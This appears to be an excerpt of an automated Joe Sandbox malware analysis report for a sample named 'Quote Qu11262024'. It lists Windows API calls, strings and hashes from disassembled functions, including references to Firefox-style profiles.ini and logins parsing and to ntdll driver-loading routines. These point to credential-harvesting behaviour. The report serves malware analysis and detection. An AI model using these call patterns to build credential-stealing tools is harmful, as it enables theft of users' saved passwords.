                                                                                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                    • API String ID: 2454223109-1580313836
                                                                                                    • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                    • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+8w@F8w@B8w
                                                                                                    • API String ID: 667068680-4123708296
                                                                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                    • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                    • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                    • API String ID: 4054529287-3175352466
                                                                                                    • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                    • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                    • API String ID: 3143752011-1996832678
                                                                                                    • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                    • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                    • API String ID: 1607361635-601624466
                                                                                                    • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                    • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                    • API String ID: 2000436516-3842416460
                                                                                                    • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                    • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 1043902810-0
                                                                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                    • _snwprintf.MSVCRT ref: 0044488A
                                                                                                    • wcscpy.MSVCRT ref: 004448B4
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                    • API String ID: 2899246560-1542517562
                                                                                                    • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                    • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040DBCD
                                                                                                    • memset.MSVCRT ref: 0040DBE9
                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                    • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                    • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                    • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                    • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                    • API String ID: 3330709923-517860148
                                                                                                    • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                    • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                    • memset.MSVCRT ref: 0040806A
                                                                                                    • memset.MSVCRT ref: 0040807F
                                                                                                    • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                    • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                    • memset.MSVCRT ref: 004081E4
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                    • String ID: logins$null
                                                                                                    • API String ID: 2148543256-2163367763
                                                                                                    • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                    • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                    APIs
                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    • memset.MSVCRT ref: 004085CF
                                                                                                    • memset.MSVCRT ref: 004085F1
                                                                                                    • memset.MSVCRT ref: 00408606
                                                                                                    • strcmp.MSVCRT ref: 00408645
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                    • memset.MSVCRT ref: 0040870E
                                                                                                    • strcmp.MSVCRT ref: 0040876B
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                    • String ID: ---
                                                                                                    • API String ID: 3437578500-2854292027
                                                                                                    • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                    • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0041087D
                                                                                                    • memset.MSVCRT ref: 00410892
                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                    • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                    • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 1010922700-0
                                                                                                    • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                    • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                    • malloc.MSVCRT ref: 004186B7
                                                                                                    • free.MSVCRT ref: 004186C7
                                                                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                    • free.MSVCRT ref: 004186E0
                                                                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                    • malloc.MSVCRT ref: 004186FE
                                                                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                    • free.MSVCRT ref: 00418716
                                                                                                    • free.MSVCRT ref: 0041872A
                                                                                                    • free.MSVCRT ref: 00418749
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
